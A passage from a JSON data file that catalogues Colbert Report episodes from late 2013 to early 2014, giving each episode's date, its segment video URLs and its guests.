      "date": "2013-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3cv3ae/intro---10-24-13",
        "http://thecolbertreport.cc.com/videos/8rabqj/girly-hats-for-the-marines",
        "http://thecolbertreport.cc.com/videos/6zcsyl/the-word---philantrophy",
        "http://thecolbertreport.cc.com/videos/60wsnw/craziest-f--king-thing-i-ve-ever-heard---tomtatoes",
        "http://thecolbertreport.cc.com/videos/9ak9w5/stephen-fry",
        "http://thecolbertreport.cc.com/videos/9py49q/sign-off---goodnight"
      ],
      "guest": "Stephen Fry"
    },
    {
      "date": "2013-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xfzjxy/healthcare-gov-s-missing-woman",
        "http://thecolbertreport.cc.com/videos/0m56pa/germany-s-nsa-outrage",
        "http://thecolbertreport.cc.com/videos/7egvpg/germany-s-nsa-outrage---mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/boarwv/lifetime-of-furfillment",
        "http://thecolbertreport.cc.com/videos/kz8x10/orlando-bloom",
        "http://thecolbertreport.cc.com/videos/fl658q/sign-off---goodnight"
      ],
      "guest": "Orlando Bloom"
    },
    {
      "date": "2013-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/dhae0b/intro---10-29-13",
        "http://thecolbertreport.cc.com/videos/qingaf/the-word---on-your-feet",
        "http://thecolbertreport.cc.com/videos/yxqllm/rand-paul-s-plagiarism-problem",
        "http://thecolbertreport.cc.com/videos/j9efvm/billy-collins",
        "http://thecolbertreport.cc.com/videos/fnaadw/sign-off----aimless-love-"
      ],
      "guest": "Billy Collins"
    },
    {
      "date": "2013-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wibml9/intro---10-30-13",
        "http://thecolbertreport.cc.com/videos/me8aye/the-gop-s-self-disapproval",
        "http://thecolbertreport.cc.com/videos/jns4fj/threatdown---divorce--undocumented-network-jumpers---global-warming",
        "http://thecolbertreport.cc.com/videos/ammjdj/shepard-smith-s-digital-dependency",
        "http://thecolbertreport.cc.com/videos/7frodo/jack-andraka",
        "http://thecolbertreport.cc.com/videos/s14fzp/sign-off---goodnight"
      ],
      "guest": "Jack Andraka"
    },
    {
      "date": "2013-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vr2jg3/intro---10-31-13",
        "http://thecolbertreport.cc.com/videos/8q3ppm/war-on-halloween---matt-lauer-s-costume",
        "http://thecolbertreport.cc.com/videos/2krnuz/blood-in-the-water---jim-wheeler-s-hypothetical-slavery-vote",
        "http://thecolbertreport.cc.com/videos/mzqttu/the-word---see-no-evil",
        "http://thecolbertreport.cc.com/videos/owduja/zach-sims",
        "http://thecolbertreport.cc.com/videos/53uet6/sign-off---the-glenlivet"
      ],
      "guest": "Zach Sims"
    },
    {
      "date": "2013-11-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hfr88n/intro---11-4-13",
        "http://thecolbertreport.cc.com/videos/v68n7l/obamacare-s-gender-blind-premiums",
        "http://thecolbertreport.cc.com/videos/oi11jp/the-word---inc--god-we-trust",
        "http://thecolbertreport.cc.com/videos/29w6fx/-realhumanpraise-for-fox-news",
        "http://thecolbertreport.cc.com/videos/z1sht0/david-folkenflik",
        "http://thecolbertreport.cc.com/videos/vl9eiz/sign-off---goodnight"
      ],
      "guest": "David Folkenflik"
    },
    {
      "date": "2013-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/owoy1b/exclusive---julius-erving-extended-interview",
        "http://thecolbertreport.cc.com/videos/7bd2cq/rob-ford-s-crack-scandal",
        "http://thecolbertreport.cc.com/videos/s5iv9f/difference-makers---tim-morrison-and-meagan-brame",
        "http://thecolbertreport.cc.com/videos/6abc8c/gay-sex-in-the-insect-world",
        "http://thecolbertreport.cc.com/videos/9v56tr/julius-erving",
        "http://thecolbertreport.cc.com/videos/du2t8n/sign-off---crack-pipe"
      ],
      "guest": "Julius Erving"
    },
    {
      "date": "2013-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpo0ya/ms--marvel-s-reboot",
        "http://thecolbertreport.cc.com/videos/el55uc/tip-wag---toys--r--us--shroom-tombs---john-pike",
        "http://thecolbertreport.cc.com/videos/hdhamk/washington-state-s-gmo-labeling-initiative",
        "http://thecolbertreport.cc.com/videos/7nyym9/brian-lehrer",
        "http://thecolbertreport.cc.com/videos/snu1i2/sign-off---welcome-baby-fischel-"
      ],
      "guest": "Brian Lehrer"
    },
    {
      "date": "2013-11-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d61yyh/employment-non-discrimination-act",
        "http://thecolbertreport.cc.com/videos/4cx9x8/sport-report---washington-redskins-name-controversy---miami-dolphins-bullying-allegations",
        "http://thecolbertreport.cc.com/videos/7cyanz/who-might-be-honoring-me-next----people-s-choice-awards",
        "http://thecolbertreport.cc.com/videos/80epmw/daniel-lieberman",
        "http://thecolbertreport.cc.com/videos/tx4mq5/sign-off---people-s-choice-awards"
      ],
      "guest": "Daniel Lieberman"
    },
    {
      "date": "2013-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84rhzu/-60-minutes--benghazi-controversy",
        "http://thecolbertreport.cc.com/videos/uwudem/-60-minutes--benghazi-controversy---poncho-denews--bogus-bombshell",
        "http://thecolbertreport.cc.com/videos/bd4gnc/chris-christie-s-sunday-media-blitz",
        "http://thecolbertreport.cc.com/videos/2lqizl/peter-baker",
        "http://thecolbertreport.cc.com/videos/kglpif/sign-off---goodnight"
      ],
      "guest": "Peter Baker"
    },
    {
      "date": "2013-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iitiue/intro---11-12-13",
        "http://thecolbertreport.cc.com/videos/pqrcpb/obamacare-enrollment-troubles",
        "http://thecolbertreport.cc.com/videos/s7e3qv/iran-nuke-negotiations---french-resistance",
        "http://thecolbertreport.cc.com/videos/0qvety/iran-nuke-negotiations---trita-parsi",
        "http://thecolbertreport.cc.com/videos/9s2qhn/shantytown-glamour-camping",
        "http://thecolbertreport.cc.com/videos/91wur1/david-christian",
        "http://thecolbertreport.cc.com/videos/61ms6y/sign-off----a-single-roll-of-the-dice-"
      ],
      "guest": "David Christian"
    },
    {
      "date": "2013-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1p3who/u-s--drone-controversy",
        "http://thecolbertreport.cc.com/videos/h4v9zq/difference-makers---philip-steel",
        "http://thecolbertreport.cc.com/videos/w8qzgv/blood-in-the-water---richard-cohen-s-conventional-wisdom",
        "http://thecolbertreport.cc.com/videos/sn95d6/blind-boys-of-alabama---jimmy-carter"
      ],
      "guest": "Blind Boys of Alabama"
    },
    {
      "date": "2013-11-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2o6sb0/philippines-typhoon-relief",
        "http://thecolbertreport.cc.com/videos/8olyhc/rob-ford-s-defiance",
        "http://thecolbertreport.cc.com/videos/wrbvsm/alexis-ohanian",
        "http://thecolbertreport.cc.com/videos/nmbdiq/sign-off---kitten-cuddle"
      ],
      "guest": "Alexis Ohanian"
    },
    {
      "date": "2013-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yv49an/intro---11-18-13",
        "http://thecolbertreport.cc.com/videos/m7v6ee/philippines-relief-from-the-colbert-nation",
        "http://thecolbertreport.cc.com/videos/suwtn9/obamacare-backlash---pundit-hyperbole",
        "http://thecolbertreport.cc.com/videos/gnc6o8/obamacare-backlash---conservative-victory-lap",
        "http://thecolbertreport.cc.com/videos/12pe6a/alpha-dog-of-the-week---chip-wilson",
        "http://thecolbertreport.cc.com/videos/cdeggb/steve-mcqueen",
        "http://thecolbertreport.cc.com/videos/5ow82m/sign-off---goodnight"
      ],
      "guest": "Steve McQueen"
    },
    {
      "date": "2013-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kzu5qm/walmart-s-employee-food-drive",
        "http://thecolbertreport.cc.com/videos/fkmwr4/america-s-wealth-divide",
        "http://thecolbertreport.cc.com/videos/nj0wp7/america-s-wealth-divide---robert-reich",
        "http://thecolbertreport.cc.com/videos/ppx1hm/slate-s--minutes-to-read--feature",
        "http://thecolbertreport.cc.com/videos/g1usdl/rick-santorum",
        "http://thecolbertreport.cc.com/videos/jnk6o6/sign-off---sweater-vest"
      ],
      "guest": "Rick Santorum"
    },
    {
      "date": "2013-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kv4dxf/intro---11-20-13",
        "http://thecolbertreport.cc.com/videos/xxqfor/trey-radel-s-cocaine-arrest",
        "http://thecolbertreport.cc.com/videos/s2213y/tip-wag---hopped-up-pops--starbucks---american-consumers",
        "http://thecolbertreport.cc.com/videos/aiu6v1/sport-report---russia-s-anti-gay-winter-games",
        "http://thecolbertreport.cc.com/videos/bjap7z/m-i-a-"
      ],
      "guest": "M.I.A."
    },
    {
      "date": "2013-11-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bz75lg/intro---11-21-13",
        "http://thecolbertreport.cc.com/videos/16t3na/nuclear-option-in-the-senate",
        "http://thecolbertreport.cc.com/videos/ynxkze/mary-fallin-and-same-sex-benefits",
        "http://thecolbertreport.cc.com/videos/pqqitw/guess-who-s-coming-to-thanksgiving-dinner-",
        "http://thecolbertreport.cc.com/videos/5idfv3/j-j--abrams",
        "http://thecolbertreport.cc.com/videos/1xi9cj/sign-off----s-"
      ],
      "guest": "J.J. Abrams"
    },
    {
      "date": "2013-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a8rc4x/intro---12-2-13",
        "http://thecolbertreport.cc.com/videos/eax2go/healthcare-gov-revamp---presidential-turkey-pardon",
        "http://thecolbertreport.cc.com/videos/32fik6/amazon-s-delivery-drones",
        "http://thecolbertreport.cc.com/videos/kzzho9/blitzkrieg-on-grinchitude---bullet-catching-christmas-tree",
        "http://thecolbertreport.cc.com/videos/tllp9w/daniel-goleman",
        "http://thecolbertreport.cc.com/videos/4pjxs1/sign-off---eighth-anniversary-portrait"
      ],
      "guest": "Daniel Goleman"
    },
    {
      "date": "2013-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/810uks/intro---12-3-13",
        "http://thecolbertreport.cc.com/videos/6yqi5n/the-pope-s-secret-life",
        "http://thecolbertreport.cc.com/videos/ojh0t8/thought-for-food---ban-on-trans-fats---mcdonald-s-mcrib-mystery",
        "http://thecolbertreport.cc.com/videos/fepuu2/the-double-robotics-office-robot",
        "http://thecolbertreport.cc.com/videos/g14s8s/ed-stone",
        "http://thecolbertreport.cc.com/videos/jkirej/sign-off---honoring-ed-stone"
      ],
      "guest": "Ed Stone"
    },
    {
      "date": "2013-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xzvt8w/do-nothing-congress",
        "http://thecolbertreport.cc.com/videos/vjdf7c/tip-wag---campaign-for-cursive---the-rnc",
        "http://thecolbertreport.cc.com/videos/y2lfd6/colbert-platinum---freedom-ship",
        "http://thecolbertreport.cc.com/videos/hzc351/bryan-stevenson",
        "http://thecolbertreport.cc.com/videos/eanv4b/sign-off"
      ],
      "guest": "Bryan Stevenson"
    },
    {
      "date": "2013-12-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/evhpy0/intro---12-5-13",
        "http://thecolbertreport.cc.com/videos/r2orue/the-in-box---flight-vs--invisibility",
        "http://thecolbertreport.cc.com/videos/t96lm4/legal-weed-in-colorado",
        "http://thecolbertreport.cc.com/videos/q1iez3/legal-weed-in-colorado---ricardo-baca",
        "http://thecolbertreport.cc.com/videos/zy6hlf/the-gop-s-lady-troubles",
        "http://thecolbertreport.cc.com/videos/blunby/alan-mulally",
        "http://thecolbertreport.cc.com/videos/xyy6ql/sign-off"
      ],
      "guest": "Allan Mulally"
    },
    {
      "date": "2013-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8h6usc/remembering-nelson-mandela",
        "http://thecolbertreport.cc.com/videos/w58dfp/the-case-against-charity---bill-o-reilly---john-stossel",
        "http://thecolbertreport.cc.com/videos/5y4hrs/the-case-against-charity---homeless-for-the-holidays",
        "http://thecolbertreport.cc.com/videos/76e84o/stephen-s-grammy-nomination",
        "http://thecolbertreport.cc.com/videos/lv0hd2/david-keith",
        "http://thecolbertreport.cc.com/videos/6p2s11/sign-off"
      ],
      "guest": "David Keith"
    },
    {
      "date": "2013-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/my8zmp/intro---12-10-13",
        "http://thecolbertreport.cc.com/videos/7yd7o2/walmart-s-job-acceptance-rate",
        "http://thecolbertreport.cc.com/videos/z9zxq1/the-word---channel-serfing",
        "http://thecolbertreport.cc.com/videos/kaj6y2/blitzkrieg-on-grinchitude---early-christmas-in-venezuela",
        "http://thecolbertreport.cc.com/videos/pt29fq/alex-blumberg",
        "http://thecolbertreport.cc.com/videos/99z3wt/sign-off---farewell-to-frank-lesser"
      ],
      "guest": "Alex Blumberg"
    },
    {
      "date": "2013-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zye2nw/blitzkrieg-on-grinchitude---festivus-pole-in-the-florida-capitol",
        "http://thecolbertreport.cc.com/videos/2vwk2a/obama-s-handshake-controversy",
        "http://thecolbertreport.cc.com/videos/ayrep6/sign-language-scandal-at-mandela-s-memorial",
        "http://thecolbertreport.cc.com/videos/jna07l/mike-huckabee-s--12-days-of-obamacare-",
        "http://thecolbertreport.cc.com/videos/ld1i97/elizabeth-gilbert",
        "http://thecolbertreport.cc.com/videos/nxssxf/sign-off---goodnight"
      ],
      "guest": "Elizabeth Gilbert"
    },
    {
      "date": "2013-12-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/juqc9w/bipartisan-budget-agreement",
        "http://thecolbertreport.cc.com/videos/ygi28a/cheating-death---sleep-health---cosmetic-surgery",
        "http://thecolbertreport.cc.com/videos/btidng/megyn-kelly-on-santa-s-skin-color",
        "http://thecolbertreport.cc.com/videos/gv6c5c/george-packer",
        "http://thecolbertreport.cc.com/videos/o3drqn/sign-off---goodnight"
      ],
      "guest": "George Packer"
    },
    {
      "date": "2013-12-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tch93k/intro---12-16-13",
        "http://thecolbertreport.cc.com/videos/t0srep/google-s-robot-acquisition",
        "http://thecolbertreport.cc.com/videos/4q1rc7/nsa-video-game-surveillance",
        "http://thecolbertreport.cc.com/videos/qepegb/stephen-s-grammy-nomination---billy-crystal",
        "http://thecolbertreport.cc.com/videos/1wx2c5/jonah-peretti"
      ],
      "guest": "Jonah Peretti, Gregg Allman, the National"
    },
    {
      "date": "2013-12-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ufkb4r/intro---12-17-13",
        "http://thecolbertreport.cc.com/videos/hdex9j/anti-nsa-ruling---edward-snowden-s-asylum-bid",
        "http://thecolbertreport.cc.com/videos/v7f6xw/tip-wag---all-china-edition",
        "http://thecolbertreport.cc.com/videos/18yj36/-ted-cruz-to-the-future-",
        "http://thecolbertreport.cc.com/videos/0hlwua/garry-trudeau"
      ],
      "guest": "Garry Trudeau, Cyndi Lauper, Alan Cumming"
    },
    {
      "date": "2013-12-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/uqgbw6/intro---12-18-13",
        "http://thecolbertreport.cc.com/videos/w20rkq/rethinking-customer-satisfaction",
        "http://thecolbertreport.cc.com/videos/hqucv3/santa-claus-ethnicity-debate",
        "http://thecolbertreport.cc.com/videos/7ick9v/santa-claus-ethnicity-debate---hans-beinholtz",
        "http://thecolbertreport.cc.com/videos/vv4aaz/keanu-reeves",
        "http://thecolbertreport.cc.com/videos/52csyt/sign-off---goodnight"
      ],
      "guest": "Keanu Reeves, Aaron Neville"
    },
    {
      "date": "2013-12-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rdc6qs/jamie-dimon-s-christmas-card",
        "http://thecolbertreport.cc.com/videos/p9rfx1/fox-news-s--12-scams-of-christmas-",
        "http://thecolbertreport.cc.com/videos/na7pll/phil-robertson-s--duck-dynasty--suspension",
        "http://thecolbertreport.cc.com/videos/3q7h60/ben-stiller"
      ],
      "guest": "Ben Stiller, the Blind Boys of Alabama"
    }
  ],
  "2014": [
    {
      "date": "2014-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qaqhv8/intro---1-6-14",
        "http://thecolbertreport.cc.com/videos/vobbe1/polar-vortex",
        "http://thecolbertreport.cc.com/videos/3goywo/tip-wag---fda--toy-manufacturers---logo-party",
        "http://thecolbertreport.cc.com/videos/hyg1jb/recreational-pot-sales-in-colorado",
        "http://thecolbertreport.cc.com/videos/5qceid/ken-roth",
        "http://thecolbertreport.cc.com/videos/f9w0xq/sign-off---polar-vortex"
      ],
      "guest": "Kenneth Roth"
    },
    {
      "date": "2014-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4uqurx/donald-trump-and-fox---friends-vs--global-warming",
        "http://thecolbertreport.cc.com/videos/s9iccj/income-inequality-debate",
        "http://thecolbertreport.cc.com/videos/v3sijl/income-inequality-debate---jim-martin",
        "http://thecolbertreport.cc.com/videos/b9gbou/time-travel-research-in-cyberspace",
        "http://thecolbertreport.cc.com/videos/bz0qvj/john-seigenthaler",
        "http://thecolbertreport.cc.com/videos/a4c8i8/sign-off----a-big-heart-open-to-god-"
      ],
      "guest": "John Seigenthaler"
    },
    {
      "date": "2014-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vojc6/intro---1-8-14",
        "http://thecolbertreport.cc.com/videos/2zkpvh/chris-christie---the-george-washington-bridge-scandal",
        "http://thecolbertreport.cc.com/videos/bkjqeq/cheating-death---robo-sperm---health-roulette",
        "http://thecolbertreport.cc.com/videos/ct0fks/the-polar-vortex---fruit-tools",
        "http://thecolbertreport.cc.com/videos/i292oo/ishmael-beah",
        "http://thecolbertreport.cc.com/videos/srasr6/sign-off---cold-weather-fruit-hammer"
      ],
      "guest": "Ishmael Beah"
    },
    {
      "date": "2014-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3nlrc7/new-jersey-bridge-scandal---damning-emails",
        "http://thecolbertreport.cc.com/videos/ez26gi/new-jersey-bridge-scandal---chris-christie-s-someone-else-a-culpa",
        "http://thecolbertreport.cc.com/videos/gvlcow/robert-gates-s--duty-",
        "http://thecolbertreport.cc.com/videos/cjww9c/jeff-skoll",
        "http://thecolbertreport.cc.com/videos/zmnwvz/sign-off---people-s-choice-award"
      ],
      "guest": "Jeff Skoll"
    },
    {
      "date": "2014-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qh2gll/intro---1-13-14",
        "http://thecolbertreport.cc.com/videos/nmeif6/water-crisis-in-west-virginia",
        "http://thecolbertreport.cc.com/videos/l6fcm2/the-word---never-ender-s-game",
        "http://thecolbertreport.cc.com/videos/ekq6m6/mirriad---retroactive-product-placement",
        "http://thecolbertreport.cc.com/videos/zf2igg/sign-off---back-scratch"
      ],
      "guest": "David Fanning"
    },
    {
      "date": "2014-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e0ksix/sport-report---baseball",
        "http://thecolbertreport.cc.com/videos/8aoa48/sport-report---winter-sports",
        "http://thecolbertreport.cc.com/videos/4lplhb/sport-report---billie-jean-king",
        "http://thecolbertreport.cc.com/videos/1urzjl/deborah-solomon",
        "http://thecolbertreport.cc.com/videos/b5df4x/sign-off---goodnight"
      ],
      "guest": "Deborah Solomon"
    },
    {
      "date": "2014-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/daejaf/ad-for-america",
        "http://thecolbertreport.cc.com/videos/bxdt1w/sport-report---uneducated-college-athletes---peyton-manning-s-sponsor-shout-out",
        "http://thecolbertreport.cc.com/videos/rbh95h/alpha-dog-of-the-week---francois-hollande",
        "http://thecolbertreport.cc.com/videos/tkqmyv/gabriel-sherman",
        "http://thecolbertreport.cc.com/videos/efgh7j/sign-off---goodnight"
      ],
      "guest": "Gabriel Sherman"
    },
    {
      "date": "2014-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pqopug/nsa-software-implants",
        "http://thecolbertreport.cc.com/videos/6omuyc/colbert-platinum---diamond-pacifiers---financial-domination",
        "http://thecolbertreport.cc.com/videos/d589xx/stephen-s-grammy-nomination---carol-burnett",
        "http://thecolbertreport.cc.com/videos/4g3c4f/naquasia-legrand",
        "http://thecolbertreport.cc.com/videos/h6vhef/sign-off---colbert-s-book-club"
      ],
      "guest": "Naquasia LeGrand"
    },
    {
      "date": "2014-01-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2jaqbf/intro---1-20-13",
        "http://thecolbertreport.cc.com/videos/6qy0qw/peyton-manning-s--omaha--chant---marijuana-s-effects-on-football",
        "http://thecolbertreport.cc.com/videos/bg48ms/the-word---thrift-justice",
        "http://thecolbertreport.cc.com/videos/1ah0qw/pope-francis-s-breastfeeding-support---affordable-sainthood",
        "http://thecolbertreport.cc.com/videos/szyyzo/scott-stossel",
        "http://thecolbertreport.cc.com/videos/3kds6e/sign-off---colbert-s-book-club-reminder"
      ],
      "guest": "Scott Stossel"
    },
    {
      "date": "2014-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6g3tkl/sign-off---colbert-s-book-club---ernest-hemingway-s--a-farewell-to-arms-",
        "http://thecolbertreport.cc.com/videos/27el91/colbert-s-book-club---mariel-hemingway-on-ernest-hemingway",
        "http://thecolbertreport.cc.com/videos/c8gx08/colbert-s-book-club---michael-chabon----a-farewell-to-arms-",
        "http://thecolbertreport.cc.com/videos/2tt8np/colbert-s-book-club---better-know-a-hemingway",
        "http://thecolbertreport.cc.com/videos/8vzg0l/colbert-s-book-club---ernest-hemingway"
      ],
      "guest": "Michael Chabon, Mariel Hemingway"
    },
    {
      "date": "2014-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o2dl8a/intro---1-22-14",
        "http://thecolbertreport.cc.com/videos/id8eug/mystery-doughnut-on-mars",
        "http://thecolbertreport.cc.com/videos/db8f37/tip-wag---air-force--dr--keith-ablow---westminster-dog-show",
        "http://thecolbertreport.cc.com/videos/wjov9z/tikker-death-watch",
        "http://thecolbertreport.cc.com/videos/y85ykp/charles-duhigg",
        "http://thecolbertreport.cc.com/videos/ihby00/sign-off---mutt"
      ],
      "guest": "Charles Duhigg"
    },
    {
      "date": "2014-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ay6diu/riots-in-the-ukraine",
        "http://thecolbertreport.cc.com/videos/nnj3ic/end-of-net-neutrality",
        "http://thecolbertreport.cc.com/videos/qatuhg/end-of-net-neutrality---tim-wu",
        "http://thecolbertreport.cc.com/videos/0i8pwp/china-s-colbert-report-rip-off",
        "http://thecolbertreport.cc.com/videos/fykny6/patricia-churchland",
        "http://thecolbertreport.cc.com/videos/5axbrg/sign-off---goodnight"
      ],
      "guest": "Patricia Churchland"
    },
    {
      "date": "2014-01-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qs3r6w/logo-restrictions-for-the-super-bowl",
        "http://thecolbertreport.cc.com/videos/51gnff/richard-sherman-s-rant-fallout",
        "http://thecolbertreport.cc.com/videos/mk6zsq/nate-silver",
        "http://thecolbertreport.cc.com/videos/c58bm1/sign-off---grammy-award"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2014-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gzw6pe/superb-owl-xlviii---nfl-extra-point-debate",
        "http://thecolbertreport.cc.com/videos/g3ng7g/fallback-position---championship-nfl-quarterback",
        "http://thecolbertreport.cc.com/videos/y1y1q6/spotted-owls-vs--barred-owls---david-yarnold",
        "http://thecolbertreport.cc.com/videos/wx55bg/justin-tuck",
        "http://thecolbertreport.cc.com/videos/q6n89x/sign-off---tootsie-pop"
      ],
      "guest": "Justin Tuck"
    },
    {
      "date": "2014-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/79qyj3/superb-owl-xlviii---football-christmas",
        "http://thecolbertreport.cc.com/videos/pzw1hz/fallback-position---championship-nfl-quarterback-pt--2",
        "http://thecolbertreport.cc.com/videos/0czypw/distractions---reactions-at-the-state-of-the-union",
        "http://thecolbertreport.cc.com/videos/6h1tef/cris-carter"
      ],
      "guest": "Cris Carter"
    },
    {
      "date": "2014-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vp5oqx/superb-owl-xlviii---football-health-concerns",
        "http://thecolbertreport.cc.com/videos/8z0t1l/superb-owl-xlviii---football-health-concerns---steve-fainaru---mark-fainaru-wada",
        "http://thecolbertreport.cc.com/videos/b88aif/big-game-debate-with-ed-murray-and-michael-hancock",
        "http://thecolbertreport.cc.com/videos/7aqq1s/drew-brees",
        "http://thecolbertreport.cc.com/videos/yucj0t/sign-off---football-toss"
      ],
      "guest": "Drew Brees"
    },
    {
      "date": "2014-02-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kmzt7v/coca-cola-s-diverse--america-the-beautiful--ad",
        "http://thecolbertreport.cc.com/videos/65qhlv/tip-wag---litigious-cheerleaders--pope-francis---china",
        "http://thecolbertreport.cc.com/videos/nezg8b/j-k--rowling-s-ron-and-hermione-bombshell",
        "http://thecolbertreport.cc.com/videos/nocpjv/jennifer-senior",
        "http://thecolbertreport.cc.com/videos/msb2vl/sign-off---goodnight"
      ],
      "guest": "Jennifer Senior"
    },
    {
      "date": "2014-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m0k7nu/black-history-of-children-s-dental-health-month---chris-christie-s-bridge-scandal-connection",
        "http://thecolbertreport.cc.com/videos/81q2jm/chris-christie-vs--david-wildstein-on-the-new-jersey-bridge-scandal",
        "http://thecolbertreport.cc.com/videos/49r39y/pussy-riot-pt--1",
        "http://thecolbertreport.cc.com/videos/08f0xw/pussy-riot-pt--2",
        "http://thecolbertreport.cc.com/videos/ubzb8b/sign-off---pussy-riot----bringing-human-rights-back-home-"
      ],
      "guest": "Pussy Riot"
    },
    {
      "date": "2014-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nn8d7g/intro---2-5-14",
        "http://thecolbertreport.cc.com/videos/w3uorg/obamacare-jobs-debate",
        "http://thecolbertreport.cc.com/videos/djw49l/america-s-wealthy-under-siege---mort-zuckerman",
        "http://thecolbertreport.cc.com/videos/cjdkxj/lake-street-dive",
        "http://thecolbertreport.cc.com/videos/6itibl/sign-off---goodnight"
      ],
      "guest": "Lake Street Dive"
    },
    {
      "date": "2014-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tzqa3o/obama---the-keystone-xl-pipeline",
        "http://thecolbertreport.cc.com/videos/e3q55j/sochi-olympics-cry-athlon",
        "http://thecolbertreport.cc.com/videos/yzcp46/tip-wag---tsa-peeping-toms--domino-s-pizza-artists---federal-judges",
        "http://thecolbertreport.cc.com/videos/ze9n7p/paul-krugman",
        "http://thecolbertreport.cc.com/videos/1ur5x9/sign-off---welcome-baby-eli-"
      ],
      "guest": "Paul Krugman"
    },
    {
      "date": "2014-02-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/alv9kr/rocky-start-at-the-sochi-olympics",
        "http://thecolbertreport.cc.com/videos/155uge/sport-report---from-russia-with-love--but-no-gay-stuff-",
        "http://thecolbertreport.cc.com/videos/s385jl/taliban-dognappers",
        "http://thecolbertreport.cc.com/videos/hmu6hf/patrick-kennedy",
        "http://thecolbertreport.cc.com/videos/bl6jzi/sign-off---buddy-cole"
      ],
      "guest": "Patrick Kennedy"
    },
    {
      "date": "2014-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zddxmq/intro---2-11-14",
        "http://thecolbertreport.cc.com/videos/yesavg/blade-in-the-usa",
        "http://thecolbertreport.cc.com/videos/ow2caa/sport-report---from-russia-with-love--but-no-gay-stuff----u-s--speedskating-team",
        "http://thecolbertreport.cc.com/videos/cxui4b/sport-report---michael-sam-s-coming-out",
        "http://thecolbertreport.cc.com/videos/8yt2ar/charlie-crist",
        "http://thecolbertreport.cc.com/videos/v6h2iw/sign-off---goodnight"
      ],
      "guest": "Charlie Crist"
    },
    {
      "date": "2014-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mke8f4/white-house-state-dinner",
        "http://thecolbertreport.cc.com/videos/ngjlqq/bill-o-reilly-s-interview-of-the-decade",
        "http://thecolbertreport.cc.com/videos/f7yt2f/because-shep---white-house-menu-report",
        "http://thecolbertreport.cc.com/videos/zqevr4/godfrey-reggio",
        "http://thecolbertreport.cc.com/videos/wd8rlk/sign-off---au-revoir"
      ],
      "guest": "Godfrey Reggio"
    },
    {
      "date": "2014-02-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cb08sc/intro---2-18-14",
        "http://thecolbertreport.cc.com/videos/esabem/jimmy-fallon-s--tonight-show--debut",
        "http://thecolbertreport.cc.com/videos/icw75d/transgender-awareness",
        "http://thecolbertreport.cc.com/videos/px4k4w/transgender-awareness---janet-mock",
        "http://thecolbertreport.cc.com/videos/fpn2d7/brian-greene",
        "http://thecolbertreport.cc.com/videos/7cxypm/sign-off---goodnight"
      ],
      "guest": "Brian Greene"
    },
    {
      "date": "2014-02-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ht320/intro---2-19-14",        
        "http://thecolbertreport.cc.com/videos/z8viri/sport-report---from-russia-with-love--but-no-gay-stuff----buddy-cole-in-sochi",
        "http://thecolbertreport.cc.com/videos/k0fmq0/victory-and-vigilance-at-the-sochi-games",
        "http://thecolbertreport.cc.com/videos/pdgpm2/smile-file---al-qaeda-bomb-blunder",
        "http://thecolbertreport.cc.com/videos/80x11s/alexander-payne",
        "http://thecolbertreport.cc.com/videos/r3yso9/sign-off---goodnight"
      ],
      "guest": "Alexander Payne"
    },
    {
      "date": "2014-02-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gtx5i8/auction-for-bill-o-reilly-s-stolen-microwave",
